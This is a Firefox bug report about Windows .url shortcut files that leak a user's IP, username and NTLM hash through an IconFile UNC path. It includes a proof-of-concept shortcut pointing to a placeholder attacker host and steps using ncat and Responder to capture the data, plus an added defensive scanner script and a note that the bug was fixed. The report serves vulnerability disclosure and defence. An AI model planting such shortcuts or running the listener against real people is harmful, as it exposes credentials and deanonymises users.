URL files on Windows should be flagged as potentially malicious
(Toolkit :: Safe Browsing, enhancement)
(Reporter: bugzilla_mozilla_org, Unassigned)
Steps to reproduce:
- Open a listener on port 445 (SMB) anywhere on the internet. A simple ncat -lvp 445 is enough for obtaining a real IP address, bypassing the browser's proxy settings (impacts Tor Browser), although Responder (https://github.com/lgandx/Responder) can also be used to grab more data about the user, including arbitrary environment variables, the real username and the NTLM password hash.
- Create a file with a url extension containing the following contents and host it anywhere on the web (replacing x.x.x.x with the IP of the listener created in the previous step).

    [InternetShortcut]
    URL=whatever
    WorkingDirectory=whatever
    IconFile=\\x.x.x.x\%USERNAME%.icon
    IconIndex=1

- Download the file created in the previous step.
Firefox downloaded the file. If you were to open the downloads directory in Windows File Explorer, it would send out a ping to the server containing a lot of potentially sensitive data.
Firefox should have flagged the file as potentially malicious and not downloaded it automatically, even with browser.download.always_ask_before_handling_new_types set to false.
This is the behavior of the Chromium browser (https://bugs.chromium.org/p/chromium/issues/detail?id=335029)
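A defensive check for the file format shown in the report, as an added example that is not part of the original bug report or of Firefox's code: it parses .url files and lists the [InternetShortcut] fields that name a network host. The set of keys inspected, the function names and the sample files are assumptions constructed for this example.

```python
from pathlib import Path

# Assumption of this example: keys in [InternetShortcut] that can hold a path.
PATH_KEYS = {"url", "iconfile", "workingdirectory"}

def is_remote(value):
    """True if value is a UNC path or file: URL that names a network host."""
    v = value.strip().strip('"').replace("/", "\\")
    if v.lower().startswith("file:"):
        v = v[5:]
    if v.lower().startswith("\\\\?\\unc\\"):
        return True
    if not v.startswith("\\\\"):
        return False
    host = v[2:].split("\\", 1)[0].lower()
    # \\?\ and \\.\ are local device prefixes; an empty host is file:///C:/...
    return host not in ("", "?", ".", "localhost")

def remote_references(text):
    """Return [(key, value)] for [InternetShortcut] fields naming a remote host."""
    findings, section = [], None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() in PATH_KEYS and is_remote(value):
                findings.append((key, value))
    return findings

def scan(directory):
    """Map each .url file under directory to its remote references, if any."""
    hits = {}
    for path in Path(directory).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".url":
            found = remote_references(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples: the file from the report, and a shortcut with a local icon.
REPORTED = r"""[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
"""
BENIGN = "[InternetShortcut]\nURL=https://example.org/\nIconFile=C:\\Windows\\System32\\shell32.dll\n"
```

Calling scan() on a downloads directory returns only the shortcuts that would make Explorer contact another host, so they can be reviewed or removed before the folder is opened.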
4 months ago
This was fixed in bug 1809923. Sorry we didn't notice this one... "SafeBrowsing" isn't the feature that controls this.